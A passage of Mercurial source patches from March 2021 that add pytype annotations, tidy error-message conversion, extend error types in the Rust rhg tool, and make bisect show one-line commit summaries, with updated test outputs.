(path, pycompat.bytestr(e)) + _(b'invalid path %s: %s') % (path, stringutil.forcebytestr(e)) ) except OSError: isfile = False diff --git a/mercurial/hgweb/webcommands.py b/mercurial/hgweb/webcommands.py --- a/mercurial/hgweb/webcommands.py +++ b/mercurial/hgweb/webcommands.py @@ -1156,6 +1156,7 @@ linerange = None if lrange is not None: + assert lrange is not None # help pytype (!?) linerange = webutil.formatlinerange(*lrange) # deactivate numeric nav links when linerange is specified as this # would required a dedicated "revnav" class diff --git a/mercurial/hgweb/wsgicgi.py b/mercurial/hgweb/wsgicgi.py --- a/mercurial/hgweb/wsgicgi.py +++ b/mercurial/hgweb/wsgicgi.py @@ -25,7 +25,7 @@ procutil.setbinary(procutil.stdout) environ = dict(pycompat.iteritems(os.environ)) # re-exports - environ.setdefault('PATH_INFO', b'') + environ.setdefault('PATH_INFO', '') if environ.get('SERVER_SOFTWARE', '').startswith('Microsoft-IIS'): # IIS includes script_name in PATH_INFO scriptname = environ['SCRIPT_NAME'] diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -2336,6 +2336,7 @@ def tracktags(tr2): repo = reporef() + assert repo is not None # help pytype oldfnodes = tagsmod.fnoderevs(repo.ui, repo, oldheads) newheads = repo.changelog.headrevs() newfnodes = tagsmod.fnoderevs(repo.ui, repo, newheads) @@ -2372,6 +2373,7 @@ # gating. tracktags(tr2) repo = reporef() + assert repo is not None # help pytype singleheadopt = (b'experimental', b'single-head-per-branch') singlehead = repo.ui.configbool(*singleheadopt) @@ -2475,6 +2477,8 @@ def hookfunc(unused_success): repo = reporef() + assert repo is not None # help pytype + if hook.hashook(repo.ui, b'txnclose-bookmark'): bmchanges = sorted(tr.changes[b'bookmarks'].items()) for name, (old, new) in bmchanges: @@ -2506,7 +2510,9 @@ b'txnclose', throw=False, **pycompat.strkwargs(hookargs) ) - reporef()._afterlock(hookfunc) + repo = reporef() + assert repo is not None # help pytype + repo._afterlock(hookfunc) tr.addfinalize(b'txnclose-hook', txnclosehook) # Include a leading "-" to make it happen before the transaction summary @@ -2517,7 +2523,9 @@ def txnaborthook(tr2): """To be run if transaction is aborted""" - reporef().hook( + repo = reporef() + assert repo is not None # help pytype + repo.hook( b'txnabort', throw=False, **pycompat.strkwargs(tr2.hookargs) ) @@ -2700,6 +2708,7 @@ def updater(tr): repo = reporef() + assert repo is not None # help pytype repo.updatecaches(tr) return updater @@ -2915,7 +2924,7 @@ If both 'lock' and 'wlock' must be acquired, ensure you always acquires 'wlock' first to avoid a dead-lock hazard.""" - l = self._wlockref and self._wlockref() + l = self._wlockref() if self._wlockref else None if l is not None and l.held: l.lock() return l diff --git a/mercurial/logcmdutil.py b/mercurial/logcmdutil.py --- a/mercurial/logcmdutil.py +++ b/mercurial/logcmdutil.py @@ -52,6 +52,7 @@ Dict, List, Optional, + Sequence, Tuple, ) @@ -754,7 +755,7 @@ def parseopts(ui, pats, opts): - # type: (Any, List[bytes], Dict[bytes, Any]) -> walkopts + # type: (Any, Sequence[bytes], Dict[bytes, Any]) -> walkopts """Parse log command options into walkopts The returned walkopts will be passed in to getrevs() or makewalker(). diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -165,7 +165,7 @@ try: s.login(username, password) except smtplib.SMTPException as inst: - raise error.Abort(inst) + raise error.Abort(stringutil.forcebytestr(inst)) def send(sender, recipients, msg): try: diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -20,6 +20,7 @@ nullrev, ) from .thirdparty import attr +from .utils import stringutil from . import ( copies, encoding, @@ -1343,7 +1344,7 @@ except OSError as inst: repo.ui.warn( _(b"update failed to remove %s: %s!\n") - % (f, pycompat.bytestr(inst.strerror)) + % (f, stringutil.forcebytestr(inst.strerror)) ) if i == 100: yield i, f diff --git a/mercurial/obsutil.py b/mercurial/obsutil.py --- a/mercurial/obsutil.py +++ b/mercurial/obsutil.py @@ -782,7 +782,7 @@ # closestsuccessors returns an empty list for pruned revisions, remap it # into a list containing an empty list for future processing if ssets == []: - ssets = [[]] + ssets = [_succs()] # Try to recover pruned markers succsmap = repo.obsstore.successors diff --git a/mercurial/patch.py b/mercurial/patch.py --- a/mercurial/patch.py +++ b/mercurial/patch.py @@ -1210,7 +1210,7 @@ # Patch comment based on the Git one (based on comment at end of # https://mercurial-scm.org/wiki/RecordExtension) phelp = b'---' + _( - """ + b""" To remove '-' lines, make them ' ' lines (context). To remove '+' lines, delete them. Lines starting with # will be removed from the patch. diff --git a/mercurial/posix.py b/mercurial/posix.py --- a/mercurial/posix.py +++ b/mercurial/posix.py @@ -321,9 +321,10 @@ fullpath = os.path.join(cachedir, target) open(fullpath, b'w').close() except IOError as inst: - if ( - inst[0] == errno.EACCES - ): # pytype: disable=unsupported-operands + # pytype: disable=unsupported-operands + if inst[0] == errno.EACCES: + # pytype: enable=unsupported-operands + # If we can't write to cachedir, just pretend # that the fs is readonly and by association # that the fs won't support symlinks. This diff --git a/mercurial/pure/osutil.py b/mercurial/pure/osutil.py --- a/mercurial/pure/osutil.py +++ b/mercurial/pure/osutil.py @@ -172,7 +172,7 @@ else: import msvcrt - _kernel32 = ctypes.windll.kernel32 + _kernel32 = ctypes.windll.kernel32 # pytype: disable=module-attr _DWORD = ctypes.c_ulong _LPCSTR = _LPSTR = ctypes.c_char_p @@ -216,7 +216,7 @@ _kernel32.CreateFileA.restype = _HANDLE def _raiseioerror(name): - err = ctypes.WinError() + err = ctypes.WinError() # pytype: disable=module-attr raise IOError( err.errno, '%s: %s' % (encoding.strfromlocal(name), err.strerror) ) @@ -271,7 +271,7 @@ if fh == _INVALID_HANDLE_VALUE: _raiseioerror(name) - fd = msvcrt.open_osfhandle(fh, flags) + fd = msvcrt.open_osfhandle(fh, flags) # pytype: disable=module-attr if fd == -1: _kernel32.CloseHandle(fh) _raiseioerror(name) diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -570,7 +570,7 @@ def parse_data(data): """parse parse nodemap data into a nodemap Trie""" if (len(data) % S_BLOCK.size) != 0: - msg = "nodemap data size is not a multiple of block size (%d): %d" + msg = b"nodemap data size is not a multiple of block size (%d): %d" raise error.Abort(msg % (S_BLOCK.size, len(data))) if not data: return Block(), None diff --git a/mercurial/sslutil.py b/mercurial/sslutil.py --- a/mercurial/sslutil.py +++ b/mercurial/sslutil.py @@ -269,7 +269,7 @@ if b'SSLKEYLOGFILE' in encoding.environ: try: - import sslkeylog + import sslkeylog # pytype: disable=import-error sslkeylog.set_keylog( pycompat.fsdecode(encoding.environ[b'SSLKEYLOGFILE']) @@ -543,7 +543,9 @@ # Use the list of more secure ciphers if found in the ssl module. if util.safehasattr(ssl, b'_RESTRICTED_SERVER_CIPHERS'): sslcontext.options |= getattr(ssl, 'OP_CIPHER_SERVER_PREFERENCE', 0) + # pytype: disable=module-attr sslcontext.set_ciphers(ssl._RESTRICTED_SERVER_CIPHERS) + # pytype: enable=module-attr if requireclientcert: sslcontext.verify_mode = ssl.CERT_REQUIRED diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -1891,7 +1891,12 @@ if info.issym(): data = info.linkname else: - data = tar.extractfile(info).read() + f = tar.extractfile(info) + if f: + data = f.read() + else: + self.ui.warn(_(b'skipping "%s" (unknown type)') % bname) + continue archiver.addfile(prefix + bname, info.mode, info.issym(), data) total += 1 progress.increment() diff --git a/mercurial/testing/revlog.py b/mercurial/testing/revlog.py --- a/mercurial/testing/revlog.py +++ b/mercurial/testing/revlog.py @@ -24,7 +24,7 @@ try: - from ..cext import parsers as cparsers + from ..cext import parsers as cparsers # pytype: disable=import-error except ImportError: cparsers = None diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -581,6 +581,7 @@ # reference to its new location. So clean it up manually. Alternatively, we # could update srcrepo.svfs and other variables to point to the new # location. This is simpler. + assert backupvfs is not None # help pytype backupvfs.unlink(b'store/lock') return backuppath diff --git a/mercurial/urllibcompat.py b/mercurial/urllibcompat.py --- a/mercurial/urllibcompat.py +++ b/mercurial/urllibcompat.py @@ -148,6 +148,7 @@ else: + # pytype: disable=import-error import BaseHTTPServer import CGIHTTPServer import SimpleHTTPServer @@ -155,6 +156,8 @@ import urllib import urlparse + # pytype: enable=import-error + urlreq._registeraliases( urllib, ( diff --git a/mercurial/utils/hashutil.py b/mercurial/utils/hashutil.py --- a/mercurial/utils/hashutil.py +++ b/mercurial/utils/hashutil.py @@ -3,7 +3,7 @@ import hashlib try: - from ..thirdparty import sha1dc + from ..thirdparty import sha1dc # pytype: disable=import-error sha1 = sha1dc.sha1 except (ImportError, AttributeError): diff --git a/mercurial/utils/procutil.py b/mercurial/utils/procutil.py --- a/mercurial/utils/procutil.py +++ b/mercurial/utils/procutil.py @@ -152,8 +152,8 @@ if pycompat.iswindows: # Work around Windows bugs. - stdout = platform.winstdout(stdout) - stderr = platform.winstdout(stderr) + stdout = platform.winstdout(stdout) # pytype: disable=module-attr + stderr = platform.winstdout(stderr) # pytype: disable=module-attr if isatty(stdout): # The standard library doesn't offer line-buffered binary streams. stdout = make_line_buffered(stdout) @@ -164,8 +164,8 @@ stderr = sys.stderr if pycompat.iswindows: # Work around Windows bugs. - stdout = platform.winstdout(stdout) - stderr = platform.winstdout(stderr) + stdout = platform.winstdout(stdout) # pytype: disable=module-attr + stderr = platform.winstdout(stderr) # pytype: disable=module-attr if isatty(stdout): if pycompat.iswindows: # The Windows C runtime library doesn't support line buffering. diff --git a/mercurial/utils/resourceutil.py b/mercurial/utils/resourceutil.py --- a/mercurial/utils/resourceutil.py +++ b/mercurial/utils/resourceutil.py @@ -70,12 +70,14 @@ ) def is_resource(package, name): - return resources.is_resource( + return resources.is_resource( # pytype: disable=module-attr pycompat.sysstr(package), encoding.strfromlocal(name) ) def contents(package): + # pytype: disable=module-attr for r in resources.contents(pycompat.sysstr(package)): + # pytype: enable=module-attr yield encoding.strtolocal(r) diff --git a/mercurial/verify.py b/mercurial/verify.py --- a/mercurial/verify.py +++ b/mercurial/verify.py @@ -14,6 +14,9 @@ nullid, short, ) +from .utils import ( + stringutil, +) from . import ( error, @@ -81,7 +84,7 @@ def _exc(self, linkrev, msg, inst, filename=None): """record exception raised during the verify process""" - fmsg = pycompat.bytestr(inst) + fmsg = stringutil.forcebytestr(inst) if not fmsg: fmsg = pycompat.byterepr(inst) self._err(linkrev, b"%s: %s" % (msg, fmsg), filename) @@ -431,6 +434,7 @@ filenodes.setdefault(f, {}).update(onefilenodes) if not dir and subdirnodes: + assert subdirprogress is not None # help pytype subdirprogress.complete() if self.warnorphanstorefiles: for f in sorted(storefiles): diff --git a/mercurial/win32.py b/mercurial/win32.py --- a/mercurial/win32.py +++ b/mercurial/win32.py @@ -20,10 +20,12 @@ pycompat, ) +# pytype: disable=module-attr _kernel32 = ctypes.windll.kernel32 _advapi32 = ctypes.windll.advapi32 _user32 = ctypes.windll.user32 _crypt32 = ctypes.windll.crypt32 +# pytype: enable=module-attr _BOOL = ctypes.c_long _WORD = ctypes.c_ushort @@ -311,7 +313,9 @@ _kernel32.GetCurrentProcessId.argtypes = [] _kernel32.GetCurrentProcessId.restype = _DWORD +# pytype: disable=module-attr _SIGNAL_HANDLER = ctypes.WINFUNCTYPE(_BOOL, _DWORD) +# pytype: enable=module-attr _kernel32.SetConsoleCtrlHandler.argtypes = [_SIGNAL_HANDLER, _BOOL] _kernel32.SetConsoleCtrlHandler.restype = _BOOL @@ -336,7 +340,9 @@ _user32.ShowWindow.argtypes = [_HANDLE, ctypes.c_int] _user32.ShowWindow.restype = _BOOL +# pytype: disable=module-attr _WNDENUMPROC = ctypes.WINFUNCTYPE(_BOOL, _HWND, _LPARAM) +# pytype: enable=module-attr _user32.EnumWindows.argtypes = [_WNDENUMPROC, _LPARAM] _user32.EnumWindows.restype = _BOOL @@ -357,7 +363,7 @@ code = _kernel32.GetLastError() if code > 0x7FFFFFFF: code -= 2 ** 32 - err = ctypes.WinError(code=code) + err = ctypes.WinError(code=code) # pytype: disable=module-attr raise OSError( err.errno, '%s: %s' % (encoding.strfromlocal(name), err.strerror) ) @@ -466,7 +472,7 @@ def peekpipe(pipe): - handle = msvcrt.get_osfhandle(pipe.fileno()) + handle = msvcrt.get_osfhandle(pipe.fileno()) # pytype: disable=module-attr avail = _DWORD() if not _kernel32.PeekNamedPipe( @@ -475,7 +481,7 @@ err = _kernel32.GetLastError() if err == _ERROR_BROKEN_PIPE: return 0 - raise ctypes.WinError(err) + raise ctypes.WinError(err) # pytype: disable=module-attr return avail.value @@ -506,10 +512,12 @@ size = 600 buf = ctypes.create_string_buffer(size + 1) len = _kernel32.GetModuleFileNameA(None, ctypes.byref(buf), size) + # pytype: disable=module-attr if len == 0: raise ctypes.WinError() # Note: WinError is a function elif len == size: raise ctypes.WinError(_ERROR_INSUFFICIENT_BUFFER) + # pytype: enable=module-attr return buf.value @@ -528,7 +536,8 @@ buf = ctypes.create_string_buffer(size) if not _kernel32.GetVolumePathNameA(realpath, ctypes.byref(buf), size): - raise ctypes.WinError() # Note: WinError is a function + # Note: WinError is a function + raise ctypes.WinError() # pytype: disable=module-attr return buf.value @@ -558,7 +567,8 @@ if not _kernel32.GetVolumeInformationA( volume, None, 0, None, None, None, ctypes.byref(name), size ): - raise ctypes.WinError() # Note: WinError is a function + # Note: WinError is a function + raise ctypes.WinError() # pytype: disable=module-attr return name.value @@ -568,7 +578,7 @@ size = _DWORD(300) buf = ctypes.create_string_buffer(size.value + 1) if not _advapi32.GetUserNameA(ctypes.byref(buf), ctypes.byref(size)): - raise ctypes.WinError() + raise ctypes.WinError() # pytype: disable=module-attr return buf.value @@ -589,7 +599,7 @@ h = _SIGNAL_HANDLER(handler) _signalhandler.append(h) # needed to prevent garbage collection if not _kernel32.SetConsoleCtrlHandler(h, True): - raise ctypes.WinError() + raise ctypes.WinError() # pytype: disable=module-attr def hidewindow(): @@ -686,7 +696,7 @@ ctypes.byref(pi), ) if not res: - raise ctypes.WinError() + raise ctypes.WinError() # pytype: disable=module-attr _kernel32.CloseHandle(pi.hProcess) _kernel32.CloseHandle(pi.hThread) diff --git a/mercurial/wireprotoserver.py b/mercurial/wireprotoserver.py --- a/mercurial/wireprotoserver.py +++ b/mercurial/wireprotoserver.py @@ -24,6 +24,7 @@ from .utils import ( cborutil, compression, + stringutil, ) stringio = util.stringio @@ -233,10 +234,12 @@ except hgwebcommon.ErrorResponse as e: for k, v in e.headers: res.headers[k] = v - res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e)) + res.status = hgwebcommon.statusmessage( + e.code, stringutil.forcebytestr(e) + ) # TODO This response body assumes the failed command was # "unbundle." That assumption is not always valid. - res.setbodybytes(b'0\n%s\n' % pycompat.bytestr(e)) + res.setbodybytes(b'0\n%s\n' % stringutil.forcebytestr(e)) return True diff --git a/mercurial/wireprotov2server.py b/mercurial/wireprotov2server.py --- a/mercurial/wireprotov2server.py +++ b/mercurial/wireprotov2server.py @@ -88,7 +88,9 @@ try: checkperm(rctx, req, b'pull' if permission == b'ro' else b'push') except hgwebcommon.ErrorResponse as e: - res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e)) + res.status = hgwebcommon.statusmessage( + e.code, stringutil.forcebytestr(e) + ) for k, v in e.headers: res.headers[k] = v res.setbodybytes(b'permission denied') diff --git a/mercurial/worker.py b/mercurial/worker.py --- a/mercurial/worker.py +++ b/mercurial/worker.py @@ -104,7 +104,9 @@ else: def ismainthread(): + # pytype: disable=module-attr return isinstance(threading.current_thread(), threading._MainThread) + # pytype: enable=module-attr def _blockingreader(wrapped): return wrapped diff --git a/tests/test-rebase-conflicts.t b/tests/test-rebase-conflicts.t --- a/tests/test-rebase-conflicts.t +++ b/tests/test-rebase-conflicts.t @@ -276,13 +276,13 @@ committing manifest committing changelog updating the branch cache - rebased as 2a7f09cac94c + rebased as c1ffa3b5274e rebase status stored rebase merging completed update back to initial working directory parent resolving manifests branchmerge: False, force: False, partial: False - ancestor: 2a7f09cac94c, local: 2a7f09cac94c+, remote: d79e2059b5c0 + ancestor: c1ffa3b5274e, local: c1ffa3b5274e+, remote: d79e2059b5c0 f1.txt: other deleted -> r removing f1.txt f2.txt: remote created -> g @@ -300,7 +300,7 @@ list of changesets: 4c9fbe56a16f30c0d5dcc40ec1a97bbe3325209c 19c888675e133ab5dff84516926a65672eaf04d9 - 2a7f09cac94c7f4b73ebd5cd1a62d3b2e8e336bf + c1ffa3b5274e92a9388fe782854e295d2e8d0443 bundle2-output-bundle: "HG20", 3 parts total bundle2-output-part: "changegroup" (params: 1 mandatory 1 advisory) streamed payload bundle2-output-part: "cache:rev-branch-cache" (advisory) streamed payload @@ -311,7 +311,7 @@ adding changesets add changeset 4c9fbe56a16f add changeset 19c888675e13 - add changeset 2a7f09cac94c + add changeset c1ffa3b5274e adding manifests adding file changes adding f1.txt revisions # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1616193269 -3600 # Fri Mar 19 23:34:29 2021 +0100 # Node ID 048beb0167a7df73098419d899e0a9ed52bbe76b # Parent e2f7b2695ba153eb7c03b93e3d6a70ac0c82fb59 git: fix missing case from 6266d19556ad (introduction of nodeconstants) Differential Revision: https://phab.mercurial-scm.org/D10241 diff --git a/hgext/git/gitlog.py b/hgext/git/gitlog.py --- a/hgext/git/gitlog.py +++ b/hgext/git/gitlog.py @@ -218,7 +218,7 @@ n = nodeorrev # handle looking up nullid if n == nullid: - return hgchangelog._changelogrevision(extra={}) + return hgchangelog._changelogrevision(extra={}, manifest=nullid) hn = gitutil.togitnode(n) # We've got a real commit! files = [ # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1616194306 -3600 # Fri Mar 19 23:51:46 2021 +0100 # Node ID 38f55ef058fb2bb407aae71f1f2d5af509193938 # Parent 048beb0167a7df73098419d899e0a9ed52bbe76b tests: resort to fix test with newer git versions Differential Revision: https://phab.mercurial-scm.org/D10242 diff --git a/tests/test-git-interop.t b/tests/test-git-interop.t --- a/tests/test-git-interop.t +++ b/tests/test-git-interop.t @@ -28,9 +28,9 @@ $ hg status abort: repository specified git format in .hg/requires but has no .git directory [255] + $ git config --global init.defaultBranch master $ git init Initialized empty Git repository in $TESTTMP/nogit/.git/ - $ git config --global init.defaultBranch master This status invocation shows some hg gunk because we didn't use `hg init --git`, which fixes up .git/info/exclude for us. $ hg status # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1616156333 -3600 # Fri Mar 19 13:18:53 2021 +0100 # Node ID bcdcb4423ae3dfef2abd6865dbe5f4083bf77cfb # Parent 38f55ef058fb2bb407aae71f1f2d5af509193938 rhg: Add more conversions between error types This allows using the `?` operator in more places, as the next commit does. Differential Revision: https://phab.mercurial-scm.org/D10238 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -17,6 +17,7 @@ use format_bytes::{write_bytes, DisplayBytes}; use std::collections::HashSet; use std::env; +use std::fmt; use std::path::{Path, PathBuf}; use std::str; @@ -68,6 +69,21 @@ pub expected_type: &'static str, } +impl fmt::Display for ConfigValueParseError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + // TODO: add origin and line number information, here and in + // corresponding python code + write!( + f, + "config error: {}.{} is not a {} ('{}')", + String::from_utf8_lossy(&self.section), + String::from_utf8_lossy(&self.item), + self.expected_type, + String::from_utf8_lossy(&self.value) + ) + } +} + impl Config { /// Load system and user configuration from various files. /// diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -88,25 +88,7 @@ HgError::UnsupportedFeature(explanation) => { write!(f, "unsupported feature: {}", explanation) } - HgError::ConfigValueParseError(ConfigValueParseError { - origin: _, - line: _, - section, - item, - value, - expected_type, - }) => { - // TODO: add origin and line number information, here and in - // corresponding python code - write!( - f, - "config error: {}.{} is not a {} ('{}')", - String::from_utf8_lossy(section), - String::from_utf8_lossy(item), - expected_type, - String::from_utf8_lossy(value) - ) - } + HgError::ConfigValueParseError(error) => error.fmt(f), } } } diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -17,7 +17,8 @@ dirstate_map::DirstateMap, parsers::{pack_dirstate, parse_dirstate, PARENT_SIZE}, status::{ - status, BadMatch, BadType, DirstateStatus, StatusError, StatusOptions, + status, BadMatch, BadType, DirstateStatus, HgPathCow, StatusError, + StatusOptions, }, CopyMap, CopyMapIter, DirstateEntry, DirstateParents, EntryState, StateMap, StateMapIter, diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -2,11 +2,12 @@ use crate::ui::UiError; use crate::NoRepoInCwdError; use format_bytes::format_bytes; -use hg::config::{ConfigError, ConfigParseError}; +use hg::config::{ConfigError, ConfigParseError, ConfigValueParseError}; use hg::errors::HgError; use hg::repo::RepoError; use hg::revlog::revlog::RevlogError; use hg::utils::files::get_bytes_from_path; +use hg::{DirstateError, DirstateMapError, StatusError}; use std::convert::From; /// The kind of command error @@ -61,6 +62,12 @@ } } +impl From<ConfigValueParseError> for CommandError { + fn from(error: ConfigValueParseError) -> Self { + CommandError::abort(error.to_string()) + } +} + impl From<UiError> for CommandError { fn from(_error: UiError) -> Self { // If we already failed writing to stdout or stderr, @@ -144,3 +151,24 @@ } } } + +impl From<StatusError> for CommandError { + fn from(error: StatusError) -> Self { + CommandError::abort(format!("{}", error)) + } +} + +impl From<DirstateMapError> for CommandError { + fn from(error: DirstateMapError) -> Self { + CommandError::abort(format!("{}", error)) + } +} + +impl From<DirstateError> for CommandError { + fn from(error: DirstateError) -> Self { + match error { + DirstateError::Common(error) => error.into(), + DirstateError::Map(error) => error.into(), + } + } +} # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616220969 25200 # Fri Mar 19 23:16:09 2021 -0700 # Node ID f51ff655d338427150ab0fb23fd4c02136cae228 # Parent bcdcb4423ae3dfef2abd6865dbe5f4083bf77cfb bisect: use standard one-line commit summary This makes bisect use the standardized support for one-line commit summary I added a while back. That means that it will respect the `command-templates.oneline-summary` config. If also means that the default output now includes the first line of the commit message (see test impact). Differential Revision: https://phab.mercurial-scm.org/D10245 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -1107,9 +1107,8 @@ transition = b"bad" state[transition].append(node) ctx = repo[node] - ui.status( - _(b'changeset %d:%s: %s\n') % (ctx.rev(), ctx, transition) - ) + summary = cmdutil.format_changeset_summary(ui, ctx, b'bisect') + ui.status(_(b'changeset %s: %s\n') % (summary, transition)) hbisect.checkstate(state) # bisect nodes, changesets, bgood = hbisect.bisect(repo, state) @@ -1125,15 +1124,15 @@ nodes, changesets, good = hbisect.bisect(repo, state) if extend: if not changesets: - extendnode = hbisect.extendrange(repo, state, nodes, good) - if extendnode is not None: + extendctx = hbisect.extendrange(repo, state, nodes, good) + if extendctx is not None: ui.write( - _(b"Extending search to changeset %d:%s\n") - % (extendnode.rev(), extendnode) + _(b"Extending search to changeset %s\n") + % cmdutil.format_changeset_summary(ui, extendctx, b'bisect') ) - state[b'current'] = [extendnode.node()] + state[b'current'] = [extendctx.node()] hbisect.save_state(repo, state) - return mayupdate(repo, extendnode.node()) + return mayupdate(repo, extendctx.node()) raise error.StateError(_(b"nothing to extend")) if changesets == 0: @@ -1146,12 +1145,13 @@ while size <= changesets: tests, size = tests + 1, size * 2 rev = repo.changelog.rev(node) + summary = cmdutil.format_changeset_summary(ui, repo[rev], b'bisect') ui.write( _( - b"Testing changeset %d:%s " + b"Testing changeset %s " b"(%d changesets remaining, ~%d tests)\n" ) - % (rev, short(node), changesets, tests) + % (summary, changesets, tests) ) state[b'current'] = [node] hbisect.save_state(repo, state) diff --git a/tests/test-bisect.t b/tests/test-bisect.t --- a/tests/test-bisect.t +++ b/tests/test-bisect.t @@ -200,25 +200,25 @@ update: (current) phases: 32 draft $ hg bisect -g 1 - Testing changeset 16:a2e6ea4973e9 (30 changesets remaining, ~4 tests) + Testing changeset 16:a2e6ea4973e9 "msg 16" (30 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 23:5ec79163bff4 (15 changesets remaining, ~3 tests) + Testing changeset 23:5ec79163bff4 "msg 23" (15 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved skip $ hg bisect -s - Testing changeset 24:10e0acd3809e (15 changesets remaining, ~3 tests) + Testing changeset 24:10e0acd3809e "msg 24" (15 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 27:288867a866e9 (7 changesets remaining, ~2 tests) + Testing changeset 27:288867a866e9 "msg 27" (7 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 29:b5bd63375ab9 (4 changesets remaining, ~2 tests) + Testing changeset 29:b5bd63375ab9 "msg 29" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -b - Testing changeset 28:8e0c2264c8af (2 changesets remaining, ~1 tests) + Testing changeset 28:8e0c2264c8af "msg 28" (2 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first bad revision is: @@ -234,7 +234,7 @@ $ hg bisect -b "0::3" $ hg bisect -s "13::16" $ hg bisect -g "26::tip" - Testing changeset 12:1941b52820a5 (23 changesets remaining, ~4 tests) + Testing changeset 12:1941b52820a5 "msg 12" (23 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ cat .hg/bisect.state bad b99c7b9c8e11558adef3fad9af211c58d46f325b @@ -258,25 +258,25 @@ $ hg bisect -r $ hg bisect -b null $ hg bisect -g tip - Testing changeset 15:e7fa0811edb0 (32 changesets remaining, ~5 tests) + Testing changeset 15:e7fa0811edb0 "msg 15" (32 changesets remaining, ~5 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 7:03750880c6b5 (16 changesets remaining, ~4 tests) + Testing changeset 7:03750880c6b5 "msg 7" (16 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved skip $ hg bisect -s - Testing changeset 6:a3d5c6fdf0d3 (16 changesets remaining, ~4 tests) + Testing changeset 6:a3d5c6fdf0d3 "msg 6" (16 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 2:db07c04beaca (7 changesets remaining, ~2 tests) + Testing changeset 2:db07c04beaca "msg 2" (7 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 0:b99c7b9c8e11 (3 changesets remaining, ~1 tests) + Testing changeset 0:b99c7b9c8e11 "msg 0" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -b - Testing changeset 1:5cd978ea5149 (2 changesets remaining, ~1 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (2 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first good revision is: @@ -295,7 +295,7 @@ $ hg bisect -r $ hg bisect -g null $ hg bisect -bU tip - Testing changeset 15:e7fa0811edb0 (32 changesets remaining, ~5 tests) + Testing changeset 15:e7fa0811edb0 "msg 15" (32 changesets remaining, ~5 tests) $ hg id 5cd978ea5149 @@ -306,13 +306,13 @@ $ hg bisect -r $ hg bisect -b 4 $ hg bisect -g 0 - Testing changeset 2:db07c04beaca (4 changesets remaining, ~2 tests) + Testing changeset 2:db07c04beaca "msg 2" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 1:5cd978ea5149 (4 changesets remaining, ~2 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 3:b53bea5e2fcb (4 changesets remaining, ~2 tests) + Testing changeset 3:b53bea5e2fcb "msg 3" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s Due to skipped revisions, the first bad revision could be any of: @@ -343,7 +343,7 @@ $ hg bisect -r $ hg bisect -g 0 $ hg bisect -b 2 - Testing changeset 1:5cd978ea5149 (2 changesets remaining, ~1 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (2 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s Due to skipped revisions, the first bad revision could be any of: @@ -372,19 +372,19 @@ $ hg bisect -r $ hg bisect -b 6 $ hg bisect -g 0 - Testing changeset 3:b53bea5e2fcb (6 changesets remaining, ~2 tests) + Testing changeset 3:b53bea5e2fcb "msg 3" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 